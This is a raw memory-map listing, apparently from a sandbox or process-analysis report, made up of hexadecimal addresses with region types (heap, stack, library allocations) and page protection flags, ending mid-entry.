page read and write
E82B87F000
stack
page read and write
7FFD9A7B3000
trusted library allocation
page execute and read and write
131A8000
trusted library allocation
page read and write
16CEEF47000
heap
page read and write
7FFDFAED0000
unkown
page readonly
1DC5D410000
heap
page read and write
2DDB4EE3000
heap
page read and write
281AB6A0000
heap
page read and write
1C099239000
heap
page read and write
17D13A90000
heap
page read and write
23671132000
heap
page read and write
2A04D2F4000
heap
page read and write
281AC3D4000
direct allocation
page read and write
1DFF3070000
direct allocation
page read and write
281AB60C000
heap
page read and write
14CC0914000
heap
page read and write
281ABF76000
heap
page read and write
B43000
trusted library allocation
page read and write
1BFD0471000
heap
page read and write
24646FE1000
heap
page read and write
281AB644000
heap
page read and write
F0B000
heap
page read and write
B3A9EFF000
stack
page read and write
7FFE148B0000
unkown
page readonly
1FCD61D5000
heap
page read and write
280FFFF000
stack
page read and write
FE7557F000
stack
page read and write
23BCC8D2000
heap
page read and write
2646A29F000
heap
page read and write
19525F9F000
heap
page read and write
23BCE980000
heap
page read and write
2462D10E000
heap
page read and write
281ABF52000
heap
page read and write
23BCC915000
heap
page read and write
281AC99D000
heap
page read and write
BA02BCE000
stack
page read and write
1DFF31A0000
direct allocation
page read and write
16CEEF44000
heap
page read and write
222498B6000
heap
page read and write
23BCD028000
heap
page read and write
7FFDFF256000
unkown
page execute and write copy
1DFEFC1E000
heap
page read and write
281AC556000
heap
page read and write
2646A135000
heap
page read and write
281AC9A0000
heap
page read and write
2462D3A0000
heap
page read and write
26469B1C000
heap
page read and write
2A1301E0000
heap
page read and write
1BA7E000
stack
page read and write
23BCC8F4000
heap
page read and write
25B4F181000
heap
page read and write
23E90750000
heap
page read and write
23699F51000
heap
page read and write
1DC5D151000
heap
page read and write
19522CEF000
heap
page read and write
281AD330000
direct allocation
page read and write
1630000
trusted library allocation
page read and write
23BCCB17000
heap
page read and write
21B794EC000
heap
page read and write
23BCCB1A000
heap
page read and write
26469CFA000
heap
page read and write
26469AB9000
heap
page read and write
281AC9EE000
heap
page read and write
16CEEF02000
heap
page read and write
1C09922E000
heap
page read and write
21B79519000
heap
page read and write
227EED90000
heap
page read and write
21B78EDE000
heap
page read and write
16CF0B0E000
heap
page read and write
1DFEFC27000
heap
page read and write
281AB6CE000
heap
page read and write
23BCCB13000
heap
page read and write
1C829C61000
heap
page read and write
281ACA2F000
heap
page read and write
7FFD9A81C000
trusted library allocation
page execute and read and write
215476E0000
heap
page read and write
174F1B25000
heap
page read and write
29E02E00000
heap
page read and write
7FFE13213000
unkown
page read and write
281ABD21000
heap
page read and write
15CE000
stack
page read and write
2646A28F000
heap
page read and write
281ABADD000
heap
page read and write
16CEEF72000
heap
page read and write
C5C9B7F000
stack
page read and write
2155A7CB000
heap
page read and write
17D13C49000
heap
page read and write
19525FED000
heap
page read and write
1B9AF000
stack
page read and write
2DFB7F000
stack
page read and write
1B8AC240000
heap
page read and write
26469A8A000
heap
page read and write
31A1000
trusted library allocation
page read and write
FE1000
heap
page read and write
17D13E20000
heap
page read and write
26469AA7000
heap
page read and write
2684AE60000
heap
page read and write
21B7AEE0000
heap
page read and write
1CC34E00000
heap
page read and write
7375DFF000
stack
page read and write
212531FB000
heap
page read and write
7FFD9AAB0000
trusted library allocation
page read and write
1271000
heap
page read and write
7FFDFB442000
unkown
page execute and read and write
2646A2A9000
heap
page read and write
1DA81BF0000
heap
page read and write
1F2250BA000
trusted library allocation
page read and write
1D6BCF80000
heap
page read and write
7FFD9A7C0000
trusted library allocation
page read and write
21B78FA2000
heap
page read and write
23BCD00C000
heap
page read and write
23BCC93E000
heap
page read and write
2DDB4EE2000
heap
page read and write
1DFEFD63000
direct allocation
page read and write
281AC101000
heap
page read and write
23BCE9A4000
heap
page read and write
FDB000
heap
page read and write
16CEEF33000
heap
page read and write
1D6BD010000
heap
page read and write
17D13C51000
heap
page read and write
281AC083000
heap
page read and write
281AC037000
heap
page read and write
281AC450000
direct allocation
page read and write
16CEEEEA000
heap
page read and write
211E2F91000
heap
page read and write
281AB963000
heap
page read and write
19524FBB000
heap
page read and write
281A9CC0000
heap
page read and write
281ACA05000
heap
page read and write
281ABF64000
heap
page read and write
281ABFBF000
heap
page read and write
F70000
trusted library allocation
page read and write
1FCD8174000
heap
page read and write
7FFD9A942000
trusted library allocation
page read and write
23BCD000000
heap
page read and write
7FFD9A960000
trusted library allocation
page execute and read and write
281AC0A4000
heap
page read and write
281ABF64000
heap
page read and write
23BCC915000
heap
page read and write
281ACD47000
heap
page read and write
281AC8C0000
direct allocation
page read and write
7FFD9A962000
trusted library allocation
page read and write
FDF000
stack
page read and write
2646A2A9000
heap
page read and write
281ABF39000
heap
page read and write
281AC9DC000
heap
page read and write
1D37210F000
heap
page read and write
2224EF0C000
heap
page read and write
281AC9CA000
heap
page read and write
1BFD0471000
heap
page read and write
7FFD9A7DD000
trusted library allocation
page execute and read and write
1D0CCDF0000
heap
page read and write
2538CA39000
heap
page read and write
7FFD9AAE0000
trusted library allocation
page read and write
3061000
trusted library allocation
page read and write
281ACBEB000
heap
page read and write
281ACB69000
heap
page read and write
281A9BD0000
heap
page read and write
7FFD9A9F0000
trusted library allocation
page read and write
1BF30000
heap
page read and write
1F226B4A000
trusted library allocation
page read and write
1BA7E000
stack
page read and write
129F000
stack
page read and write
23BCD010000
heap
page read and write
7FFE130C1000
unkown
page execute and read and write
1C099239000
heap
page read and write
264FC0F0000
heap
page read and write
766507F000
stack
page read and write
2DDB4EEB000
heap
page read and write
EC0000
trusted library allocation
page read and write
1BE9E000
stack
page read and write
281AD5A0000
direct allocation
page read and write
1C09920A000
heap
page read and write
281AB67B000
heap
page read and write
7FFD9A9E0000
trusted library allocation
page read and write
281AB6BF000
heap
page read and write
174F0EF9000
trusted library allocation
page read and write
174F1B3C000
heap
page read and write
23E907C1000
heap
page read and write
2463ED85000
trusted library allocation
page read and write
7FFD9AB30000
trusted library allocation
page read and write
281AC090000
heap
page read and write
12E43000
trusted library allocation
page read and write
2A04D2F5000
heap
page read and write
281ABF23000
heap
page read and write
281ABAFB000
heap
page read and write
281ABF3C000
heap
page read and write
7FFE11EE4000
unkown
page read and write
1FCD61D4000
heap
page read and write
1C64E000
stack
page read and write
70EA237000
stack
page read and write
281AC033000
heap
page read and write
281ABFBF000
heap
page read and write
174F1B25000
heap
page read and write
3812FAC000
stack
page read and write
F38000
heap
page read and write
1C098C6D000
heap
page read and write
1DC5D300000
heap
page read and write
1C099239000
heap
page read and write
281AC033000
heap
page read and write
1F23D184000
heap
page read and write
281ACDBE000
heap
page read and write
12A5E020000
heap
page read and write
23699F32000
heap
page read and write
281ACFC8000
heap
page read and write
31A0000
heap
page execute and read and write
7FF6448B4000
unkown
page readonly
1FCD67F9000
heap
page read and write
2646A2B3000
heap
page read and write
281AC117000
heap
page read and write
281AC995000
heap
page read and write
1F23D163000
heap
page read and write
23E907A0000
heap
page read and write
7FFD9A860000
trusted library allocation
page read and write
281ABF64000
heap
page read and write
281ABEC3000
heap
page read and write
7FFD9AAF2000
trusted library allocation
page read and write
281AC99E000
heap
page read and write
1FCD632E000
heap
page read and write
174F0EF5000
trusted library allocation
page read and write
281AB69B000
heap
page read and write
1FCD67E9000
heap
page read and write
1DFEFC2F000
heap
page read and write
EC5F9FF000
stack
page read and write
1DFEFC0D000
heap
page read and write
1DFF3050000
direct allocation
page read and write
1BFD0468000
heap
page read and write
281AB966000
heap
page read and write
281AB9C6000
heap
page read and write
7FF71F091000
unkown
page execute read
E00000
heap
page read and write
1F2233B4000
heap
page read and write
7FFDFAD10000
unkown
page execute and read and write
23671020000
heap
page read and write
2A75F5E1000
heap
page read and write
281ACD3F000
heap
page read and write
16CEF054000
heap
page read and write
1DFEFD60000
direct allocation
page read and write
281ABE68000
heap
page read and write
281AC960000
direct allocation
page read and write
1DFEFBF7000
heap
page read and write
281AC9DC000
heap
page read and write
BA02EFF000
stack
page read and write
23BCD039000
heap
page read and write
281A9BB0000
direct allocation
page read and write
281AB633000
heap
page read and write
16002890000
heap
page read and write
2462D108000
heap
page read and write
1FCD61CA000
heap
page read and write
22249800000
heap
page read and write
281ACB68000
heap
page read and write
1C099223000
heap
page read and write
227EEFB4000
heap
page read and write
281ACBEB000
heap
page read and write
1DFF31F0000
direct allocation
page read and write
281AC52C000
direct allocation
page read and write
281AB6CE000
heap
page read and write
281AC039000
heap
page read and write
1CC34E04000
heap
page read and write
174F1924000
heap
page read and write
1D37210F000
heap
page read and write
281AC9E1000
heap
page read and write
26469AEF000
heap
page read and write
2262D9E5000
heap
page read and write
DC0000
heap
page read and write
174F19B3000
heap
page read and write
2367113E000
heap
page read and write
281ABF5C000
heap
page read and write
1BDFF000
stack
page read and write
1D0CCE41000
heap
page read and write
2646A2AC000
heap
page read and write
2224F04D000
trusted library allocation
page read and write
7FFD9A860000
trusted library allocation
page read and write
174F199C000
heap
page read and write
281AB921000
heap
page read and write
2224ED10000
trusted library allocation
page read and write
125C1000
trusted library allocation
page read and write
281AC991000
heap
page read and write
26469B35000
heap
page read and write
281AB67D000
heap
page read and write
16CEEED0000
heap
page read and write
281ABF64000
heap
page read and write
16CEEF6E000
heap
page read and write
7FF644870000
unkown
page readonly
195247C6000
heap
page read and write
2A75F5CB000
heap
page read and write
53C92FF000
unkown
page read and write
ED5000
heap
page read and write
7FFD9AA20000
trusted library allocation
page read and write
281AD202000
heap
page read and write
21B78FA2000
heap
page read and write
2A1305E0000
heap
page read and write
25F377F0000
heap
page read and write
281AC9E1000
heap
page read and write
1B8AC1F0000
heap
page read and write
E1D55DB000
stack
page read and write
1E835A1B000
heap
page read and write
12FE3000
trusted library allocation
page read and write
1675000
heap
page read and write
9AB18FC000
stack
page read and write
12A5E390000
heap
page read and write
21B7950C000
heap
page read and write
11D0000
heap
page read and write
ED0000
heap
page read and write
139E000
stack
page read and write
12A5E0CC000
heap
page read and write
133D000
heap
page read and write
23699F83000
heap
page read and write
7FF6448AE000
unkown
page write copy
281AC9C6000
heap
page read and write
2224EE5B000
heap
page read and write
F12000
heap
page read and write
7FFE14649000
unkown
page read and write
FBB000
heap
page read and write
1E835A31000
heap
page read and write
1F22310F000
heap
page read and write
7FFE130CA000
unkown
page execute and write copy
127B000
heap
page read and write
1F224E10000
trusted library allocation
page read and write
12BD1000
trusted library allocation
page read and write
227EEE10000
heap
page read and write
281AB656000
heap
page read and write
174F197B000
heap
page read and write
16CEF076000
heap
page read and write
F9A5FFF000
unkown
page read and write
23F8AC60000
heap
page read and write
23671132000
heap
page read and write
1BBEE000
stack
page read and write
281AB656000
heap
page read and write
281ACBED000
heap
page read and write
FDD000
heap
page read and write
7FFD9A7CB000
trusted library allocation
page read and write
281ACA64000
heap
page read and write
1FCD6130000
heap
page read and write
281AB4D0000
heap
page read and write
281ABF4F000
heap
page read and write
2462F7F8000
trusted library allocation
page read and write
212531F0000
heap
page read and write
23BCE9A4000
heap
page read and write
281ABF5C000
heap
page read and write
281ABE5D000
heap
page read and write
21547701000
heap
page read and write
281AB6C2000
heap
page read and write
23BCE9A6000
heap
page read and write
1DFEFD80000
direct allocation
page read and write
11F0000
heap
page read and write
281AB698000
heap
page read and write
1DFEFC0A000
heap
page read and write
7FF71F090000
unkown
page readonly
281AC980000
direct allocation
page read and write
1DC5D130000
heap
page read and write
16CEEF16000
heap
page read and write
25F379F7000
heap
page read and write
227EEE10000
heap
page read and write
17D13C3A000
heap
page read and write
2224EE2E000
heap
page read and write
23BCD029000
heap
page read and write
281ABFBF000
heap
page read and write
2A75F5E1000
heap
page read and write
1CC34E05000
heap
page read and write
16002905000
heap
page read and write
24647020000
heap
page read and write
16CEEEFC000
heap
page read and write
23BCC913000
heap
page read and write
281AB6B9000
heap
page read and write
1C510000
heap
page read and write
23F8ADB0000
heap
page read and write
16CEEF3C000
heap
page read and write
1FCD6178000
heap
page read and write
7FFE13380000
unkown
page readonly
2155A790000
heap
page read and write
281ABF52000
heap
page read and write
281ABF64000
heap
page read and write
31BC000
trusted library allocation
page read and write
1D37210F000
heap
page read and write
7FFD9A7C0000
trusted library allocation
page read and write
281AB619000
heap
page read and write
7FFDFB301000
unkown
page execute and read and write
1DFEFC04000
heap
page read and write
281AC037000
heap
page read and write
1C098BDE000
heap
page read and write
14CC05B0000
heap
page read and write
281ABFBF000
heap
page read and write
2463ED9E000
trusted library allocation
page read and write
7FFDFF214000
unkown
page execute and read and write
160026D9000
heap
page read and write
636B0FF000
unkown
page read and write
7664DEF000
stack
page read and write
281ABF76000
heap
page read and write
281AC910000
direct allocation
page read and write
1F23D1C0000
heap
page read and write
1FCD6330000
heap
page read and write
281AB820000
direct allocation
page read and write
DF5000
heap
page read and write
CBC000
heap
page read and write
1DFEFC2F000
heap
page read and write
1FCD67C0000
heap
page read and write
7FF6448B4000
unkown
page readonly
281ABE1C000
heap
page read and write
281ACBF3000
heap
page read and write
1C098C68000
heap
page read and write
1D37210F000
heap
page read and write
174F1941000
heap
page read and write
7FFE13200000
unkown
page readonly
246473A2000
heap
page read and write
1FCD61C6000
heap
page read and write
19525FF5000
heap
page read and write
24647063000
heap
page read and write
1BCBE000
stack
page read and write
281AB6CE000
heap
page read and write
7FFD9AC10000
trusted library allocation
page read and write
174F199C000
heap
page read and write
23699E20000
heap
page read and write
19525FDD000
heap
page read and write
829857F000
stack
page read and write
A7F4FE000
stack
page read and write
2646BB34000
heap
page read and write
281ABE7E000
heap
page read and write
281ACBF1000
heap
page read and write
1F2252AE000
trusted library allocation
page read and write
1DC5D0B0000
heap
page read and write
281ABF76000
heap
page read and write
281AC04F000
heap
page read and write
23BCD008000
heap
page read and write
26469B25000
heap
page read and write
1DA818A1000
heap
page read and write
27E0000
heap
page read and write
17D13E14000
heap
page read and write
1DFEFC0A000
heap
page read and write
16CF0B04000
heap
page read and write
2646BB20000
heap
page read and write
25B4F0E0000
heap
page read and write
281ACDCD000
heap
page read and write
1CF00000
heap
page read and write
281AB662000
heap
page read and write
7FFD9A95A000
trusted library allocation
page read and write
A1CDEFF000
unkown
page read and write
15F0000
heap
page read and write
281ABF38000
heap
page read and write
281ACBB2000
heap
page read and write
1B3F6A5B000
heap
page read and write
23E90A20000
heap
page read and write
195247D0000
heap
page read and write
281AC9CC000
heap
page read and write
281AC9D5000
heap
page read and write
1C099244000
heap
page read and write
2224ED10000
trusted library allocation
page read and write
1FCD632E000
heap
page read and write
7FFD9AB20000
trusted library allocation
page read and write
C8A60FF000
stack
page read and write
264FC1A0000
heap
page read and write
281AB9DB000
heap
page read and write
1DFEFC4D000
heap
page read and write
2262DA21000
heap
page read and write
829867E000
stack
page read and write
281AC9DA000
heap
page read and write
174F0EF9000
trusted library allocation
page read and write
E50000
heap
page read and write
1DFEFC0B000
heap
page read and write
2224EDF0000
trusted library allocation
page read and write
2ECE000
stack
page read and write
1BAF0000
heap
page read and write
23BCC8F6000
heap
page read and write
16CEEEEA000
heap
page read and write
2224F010000
trusted library allocation
page read and write
7FFD9AA00000
trusted library allocation
page read and write
7FFD9A970000
trusted library allocation
page execute and read and write
1670000
heap
page read and write
174F1996000
heap
page read and write
16CEEEC9000
heap
page read and write
13B9000
heap
page read and write
23BCC915000
heap
page read and write
281ABF64000
heap
page read and write
281ABF13000
heap
page read and write
7FFE13397000
unkown
page execute and write copy
281AB6B7000
heap
page read and write
7FFDFB04B000
unkown
page execute and write copy
19522E60000
heap
page readonly
1D0CD014000
heap
page read and write
1F8B26E4000
heap
page read and write
23BCC8F5000
heap
page read and write
281AB9DD000
heap
page read and write
2074DB08000
heap
page read and write
F90000
trusted library allocation
page read and write
1C098C4B000
heap
page read and write
A977BE6000
stack
page read and write
23BCC8B0000
trusted library allocation
page read and write
7FFE13393000
unkown
page execute and read and write
19525F88000
heap
page read and write
281AC9AF000
heap
page read and write
174F198E000
heap
page read and write
23BCD01F000
heap
page read and write
19525FF5000
heap
page read and write
29E031F4000
heap
page read and write
281ACB4F000
heap
page read and write
7FFE0EBFD000
unkown
page execute and read and write
1D37211C000
heap
page read and write
2224EE00000
heap
page read and write
D11000
stack
page read and write
21B78EC0000
trusted library allocation
page read and write
281AC033000
heap
page read and write
281ABEDC000
heap
page read and write
1B8AC230000
heap
page read and write
1F224E40000
trusted library allocation
page read and write
281AC9CC000
heap
page read and write
281ACB27000
heap
page read and write
281ABA3C000
heap
page read and write
1DFF3190000
direct allocation
page read and write
281AC970000
direct allocation
page read and write
2F7FF7E000
unkown
page readonly
281ABA66000
heap
page read and write
281AC48C000
direct allocation
page read and write
281AC8B0000
direct allocation
page read and write
1BFD0420000
heap
page read and write
7FFD9A7B3000
trusted library allocation
page execute and read and write
2F01E7E000
unkown
page readonly
19524640000
heap
page read and write
2538CA41000
heap
page read and write
2224A002000
heap
page read and write
1BE4F000
stack
page read and write
23BCCAB0000
heap
page read and write
23BCC8C7000
heap
page read and write
BB1000
stack
page read and write
2DDB4E7A000
heap
page read and write
2FDF000
stack
page read and write
281AB6D9000
heap
page read and write
1E8FFE4D000
heap
page read and write
16CEEEDD000
heap
page read and write
281ACB6D000
heap
page read and write
281AB6C8000
heap
page read and write
215476F8000
heap
page read and write
26469B2D000
heap
page read and write
23BCD033000
heap
page read and write
7FFD9A7B4000
trusted library allocation
page read and write
26469B2A000
heap
page read and write
22216360000
heap
page read and write
281ACBC9000
heap
page read and write
12A5E0CC000
heap
page read and write
2463EB07000
trusted library allocation
page read and write
2074DD75000
heap
page read and write
1195000
heap
page read and write
1C098C42000
heap
page read and write
281ABF2E000
heap
page read and write
22249894000
heap
page read and write
16CEEECD000
heap
page read and write
236710E0000
heap
page read and write
24647190000
heap
page read and write
2224F050000
trusted library allocation
page read and write
13D7000
heap
page read and write
EC45DFC000
stack
page read and write
281AC9C0000
heap
page read and write
281AC8D0000
direct allocation
page read and write
83471FF000
stack
page read and write
281AB619000
heap
page read and write
281ABF64000
heap
page read and write
7FFD9A970000
trusted library allocation
page read and write
174F1B3C000
heap
page read and write
281AB630000
heap
page read and write
281ACA1E000
heap
page read and write
19525F88000
heap
page read and write
422390C000
stack
page read and write
26469B38000
heap
page read and write
3190000
heap
page read and write
2646BB2D000
heap
page read and write
15E84B00000
heap
page read and write
23671125000
heap
page read and write
25B4F181000
heap
page read and write
53C93FF000
stack
page read and write
1412F741000
heap
page read and write
14CC0631000
heap
page read and write
19525FED000
heap
page read and write
2646BB36000
heap
page read and write
24647068000
heap
page read and write
2FF1000
trusted library allocation
page read and write
174F1A3C000
trusted library allocation
page read and write
21B78F97000
heap
page read and write
22250000000
heap
page read and write
26469C20000
trusted library allocation
page read and write
1B3F6A71000
heap
page read and write
281ACDDD000
heap
page read and write
7FFD9ABA0000
trusted library allocation
page read and write
281AC220000
direct allocation
page read and write
BA032F6000
stack
page read and write
160026A0000
heap
page read and write
281AC099000
heap
page read and write
1FCD6184000
heap
page read and write
211E3080000
heap
page read and write
281ABF5C000
heap
page read and write
281AC9E1000
heap
page read and write
7FFE11EC0000
unkown
page readonly
23BCC8FF000
heap
page read and write
281AC03E000
heap
page read and write
222498FF000
heap
page read and write
16CEEF74000
heap
page read and write
2224ED00000
trusted library allocation
page read and write
1CC34E40000
heap
page read and write
1130000
heap
page read and write
2262DA11000
heap
page read and write
119D000
heap
page read and write
281AB6BF000
heap
page read and write
281AC9DC000
heap
page read and write
281AC9F1000
heap
page read and write
1DFEFC2B000
heap
page read and write
19522C99000
heap
page read and write
24646A90000
trusted library allocation
page read and write
1DFEFD7B000
direct allocation
page read and write
13CF000
heap
page read and write
26469AB5000
heap
page read and write
16CEEF70000
heap
page read and write
1B8AC2A1000
heap
page read and write
281AB4D4000
heap
page read and write
26469AB2000
heap
page read and write
281AC9D1000
heap
page read and write
281AC10E000
heap
page read and write
21B79515000
heap
page read and write
2155A7DA000
heap
page read and write
1D6BD01D000
heap
page read and write
195247CE000
heap
page read and write
1F223123000
heap
page read and write
281AC548000
direct allocation
page read and write
2074DA60000
heap
page read and write
1F8B26A0000
heap
page read and write
12BD8000
trusted library allocation
page read and write
160026E1000
heap
page read and write
16CEEF23000
heap
page read and write
1F2233B0000
heap
page read and write
281ABF09000
heap
page read and write
2646A29F000
heap
page read and write
281A9CCA000
heap
page read and write
2646A294000
heap
page read and write
10F1000
stack
page read and write
1EC765F4000
heap
page read and write
2155A7C0000
heap
page read and write
7FFE130C9000
unkown
page execute and read and write
CE6000
heap
page read and write
281AC098000
heap
page read and write
281AC033000
heap
page read and write
281AC980000
direct allocation
page read and write
7FFDF8607000
unkown
page execute and read and write
1E835A2B000
heap
page read and write
281ACA0A000
heap
page read and write
174F1B38000
heap
page read and write
2A04CF71000
heap
page read and write
27A14FC000
stack
page read and write
3C0000
heap
page read and write
D3067E000
stack
page read and write
7FFD9A8F0000
trusted library allocation
page execute and read and write
7DF4C1480000
trusted library allocation
page execute and read and write
281ABE51000
heap
page read and write
281AB6D0000
heap
page read and write
7FFE0EBD1000
unkown
page execute and read and write
281ABF13000
heap
page read and write
21B78F5B000
heap
page read and write
281AC8C0000
direct allocation
page read and write
281AB630000
heap
page read and write
16CEEF33000
heap
page read and write
D50000
heap
page read and write
281ABB0D000
heap
page read and write
222498B6000
heap
page read and write
281AC0BC000
heap
page read and write
2646A13A000
heap
page read and write
16CEEEA7000
heap
page read and write
21253445000
heap
page read and write
29E02F00000
heap
page read and write
23BCC91D000
heap
page read and write
1BC00000
heap
page execute and read and write
7FFD9A7CD000
trusted library allocation
page execute and read and write
281ABF48000
heap
page read and write
22249917000
heap
page read and write
19525F82000
heap
page read and write
21B794E7000
heap
page read and write
22249720000
heap
page read and write
1CA95240000
heap
page read and write
2224A11A000
heap
page read and write
2462D090000
heap
page read and write
281AB6C8000
heap
page read and write
174F197B000
heap
page read and write
7E5000
heap
page read and write
70EA2BE000
stack
page read and write
281ABF23000
heap
page read and write
281AC9CE000
heap
page read and write
281AB659000
heap
page read and write
23671104000
heap
page read and write
195247C6000
heap
page read and write
17D13C30000
heap
page read and write
7FFD9A8E0000
trusted library allocation
page execute and read and write
2074DA70000
heap
page read and write
23BCD02B000
heap
page read and write
70E9FFF000
stack
page read and write
21253209000
heap
page read and write
21B78F94000
heap
page read and write
1B5DC000
stack
page read and write
7FFD9A9B0000
trusted library allocation
page read and write
7FFD9A7D1000
trusted library allocation
page read and write
1D0CCCF0000
heap
page read and write
7FF71F100000
unkown
page readonly
1BF35000
heap
page read and write
BA0347E000
stack
page read and write
1DFEFC4D000
heap
page read and write
1FCD6323000
heap
page read and write
1BF1B000
heap
page read and write
281ABFBF000
heap
page read and write
281ABFBF000
heap
page read and write
31AF000
trusted library allocation
page read and write
1B3F6A71000
heap
page read and write
281ABF60000
heap
page read and write
2224A104000
heap
page read and write
1DA81A70000
heap
page read and write
281ABF76000
heap
page read and write
1FCD6142000
heap
page read and write
281AC9D5000
heap
page read and write
7FFD9A7D4000
trusted library allocation
page read and write
281AC04B000
heap
page read and write
174F1A3B000
trusted library allocation
page read and write
2369A134000
heap
page read and write
131A3000
trusted library allocation
page read and write
7FFD9A8E0000
trusted library allocation
page execute and read and write
281ABE0A000
heap
page read and write
B40000
trusted library allocation
page read and write
281AC9CE000
heap
page read and write
7FFE0EC00000
unkown
page execute and write copy
FC0000
heap
page read and write
174F1A32000
trusted library allocation
page read and write
C5C9AFF000
stack
page read and write
D198D7F000
stack
page read and write
174F1A2E000
trusted library allocation
page read and write
7FFD9A7EC000
trusted library allocation
page execute and read and write
16CEEE00000
heap
page read and write
2F001FE000
unkown
page readonly
26469B33000
heap
page read and write
2462D0D2000
heap
page read and write
23BCCB12000
heap
page read and write
281ABF4C000
heap
page read and write
264FC120000
heap
page read and write
1F225D65000
trusted library allocation
page read and write
264FC1FD000
heap
page read and write
1AF8F000
stack
page read and write
131C000
heap
page read and write
7FFE0EBF9000
unkown
page execute and read and write
16CEEF2E000
heap
page read and write
21B78F9F000
heap
page read and write
281AB9CC000
heap
page read and write
2A1301D0000
heap
page read and write
2646A291000
heap
page read and write
1BA70000
heap
page execute and read and write
1FCD67E9000
heap
page read and write
21B78FB4000
heap
page read and write
2EDDBF6000
stack
page read and write
1FCD816E000
heap
page read and write
21253444000
heap
page read and write
9E0000
heap
page read and write
19525FE5000
heap
page read and write
2224EDF0000
trusted library allocation
page read and write
16CEF1A6000
heap
page read and write
1620000
heap
page read and write
281AB66A000
heap
page read and write
281AC9A3000
heap
page read and write
7FFD9A866000
trusted library allocation
page read and write
19522CBD000
heap
page read and write
281AB6C0000
heap
page read and write
174F193B000
heap
page read and write
19522D6B000
heap
page read and write
7FF64489B000
unkown
page readonly
1C098BD4000
heap
page read and write
281ACD93000
heap
page read and write
21B7ADF4000
heap
page read and write
2462EA91000
trusted library allocation
page read and write
281AD5B0000
direct allocation
page read and write
1F23CE9B000
heap
page read and write
FE755FE000
stack
page read and write
16CEEF70000
heap
page read and write
1DA81840000
heap
page read and write
1E835D80000
heap
page read and write
2369A130000
heap
page read and write
751000
heap
page read and write
25B4F0E4000
heap
page read and write
281AB6BF000
heap
page read and write
281ABA0E000
heap
page read and write
2463EAC1000
trusted library allocation
page read and write
19525F8C000
heap
page read and write
1C099205000
heap
page read and write
7FFD9AB10000
trusted library allocation
page read and write
281AC9CA000
heap
page read and write
281ABF5C000
heap
page read and write
1C09921E000
heap
page read and write
BA035FE000
stack
page read and write
281ACB6D000
heap
page read and write
281AC9C6000
heap
page read and write
1CC34CC0000
heap
page read and write
1F2230C0000
heap
page read and write
281ABF5C000
heap
page read and write
281ACBF5000
heap
page read and write
281AC99D000
heap
page read and write
7FF644870000
unkown
page readonly
1C523000
heap
page read and write
8298478000
stack
page read and write
281AC9E1000
heap
page read and write
12A5E39A000
heap
page read and write
2462EA20000
heap
page read and write
281ACB68000
heap
page read and write
1EC76618000
heap
page read and write
1DFEFD20000
direct allocation
page read and write
281AC0BE000
heap
page read and write
281AC950000
direct allocation
page read and write
174F193A000
heap
page read and write
1FCD6182000
heap
page read and write
23BCCAD0000
trusted library allocation
page read and write
281AB6BF000
heap
page read and write
281ABF60000
heap
page read and write
7FFD9A9E0000
trusted library allocation
page read and write
281ABF3D000
heap
page read and write
281ABF60000
heap
page read and write
281ACA05000
heap
page read and write
281AC11A000
heap
page read and write
16CEEF33000
heap
page read and write
A7F0FE000
stack
page read and write
7FFD9A7B0000
trusted library allocation
page read and write
7FFE0EC02000
unkown
page read and write
7FFE148C1000
unkown
page execute read
7FFDFA9A0000
unkown
page readonly
1BFD0430000
heap
page read and write
115C000
heap
page read and write
23699F41000
heap
page read and write
174F19B3000
heap
page read and write
281AC9E1000
heap
page read and write
23699FBA000
heap
page read and write
23BCCAF0000
heap
page read and write
281AB6A1000
heap
page read and write
281AB6D6000
heap
page read and write
7FFDFB546000
unkown
page execute and read and write
20354EA0000
heap
page read and write
1DFF1560000
heap
page read and write
1F2267FC000
trusted library allocation
page read and write
174F199C000
heap
page read and write
1F23D3F0000
heap
page read and write
281ACB48000
heap
page read and write
2646BB34000
heap
page read and write
281AC090000
heap
page read and write
3050000
heap
page execute and read and write
246472A7000
heap
page read and write
7FFD9AB40000
trusted library allocation
page read and write
7FFE13201000
unkown
page execute and read and write
281AB619000
heap
page read and write
2646A2B2000
heap
page read and write
26469A30000
trusted library allocation
page read and write
174F1B33000
heap
page read and write
5CA4BEC000
stack
page read and write
7FFD9AB93000
trusted library allocation
page read and write
2224EEF2000
heap
page read and write
73B000
heap
page read and write
174F1996000
heap
page read and write
281ABFBF000
heap
page read and write
281ABF5C000
heap
page read and write
50D2AFC000
stack
page read and write
1B62D000
stack
page read and write
1DFEFC81000
heap
page read and write
1F2233BD000
heap
page read and write
174F198E000
heap
page read and write
19522D68000
heap
page read and write
1F226496000
trusted library allocation
page read and write
BA0307A000
stack
page read and write
19525F71000
heap
page read and write
1BB6E000
stack
page read and write
1F23D140000
heap
page read and write
23BCD039000
heap
page read and write
26469A63000
heap
page read and write
7FFD9A793000
trusted library allocation
page execute and read and write
281AB6C8000
heap
page read and write
281AC9C6000
heap
page read and write
2FEC000
trusted library allocation
page read and write
7FFD9A972000
trusted library allocation
page read and write
23BCC8FF000
heap
page read and write
2224EEF1000
heap
page read and write
281AB67B000
heap
page read and write
7FF71F118000
unkown
page read and write
19524B5C000
heap
page read and write
2224EE83000
heap
page read and write
281AC9A5000
heap
page read and write
2538CA2B000
heap
page read and write
215476EB000
heap
page read and write
1BEF3000
heap
page read and write
D3039F000
stack
page read and write
16CEEF1C000
heap
page read and write
7FFE1A450000
unkown
page readonly
26469B2C000
heap
page read and write
25B4F160000
heap
page read and write
19522C78000
heap
page read and write
1B80F000
stack
page read and write
E8C8B7E000
stack
page read and write
2462D0E6000
heap
page read and write
1C098C61000
heap
page read and write
1DFF31B1000
direct allocation
page read and write
281ACB27000
heap
page read and write
1DFEFC0D000
heap
page read and write
281AC9BC000
heap
page read and write
174F1A2E000
trusted library allocation
page read and write
281AB60C000
heap
page read and write
7FFD9A7BD000
trusted library allocation
page execute and read and write
1D37210F000
heap
page read and write
1C099224000
heap
page read and write
1B160000
heap
page read and write
1DFF323D000
direct allocation
page read and write
306F000
trusted library allocation
page read and write
12A5E0D9000
heap
page read and write
281AC9EE000
heap
page read and write
1FCD61D7000
heap
page read and write
2F006FB000
stack
page read and write
281AC0C6000
heap
page read and write
47B9CFB000
stack
page read and write
23F47520000
heap
page read and write
23F47587000
heap
page read and write
FE754FF000
stack
page read and write
174F1A3A000
trusted library allocation
page read and write
29AC000
trusted library allocation
page read and write
2EDDFFF000
stack
page read and write
BA03279000
stack
page read and write
1C098C07000
heap
page read and write
281ABA1C000
heap
page read and write
2462D148000
heap
page read and write
1D0CD020000
heap
page read and write
1D6BCFA0000
heap
page read and write
26469ADF000
heap
page read and write
1C098B30000
trusted library allocation
page read and write
53C8FCC000
stack
page read and write
1C098C50000
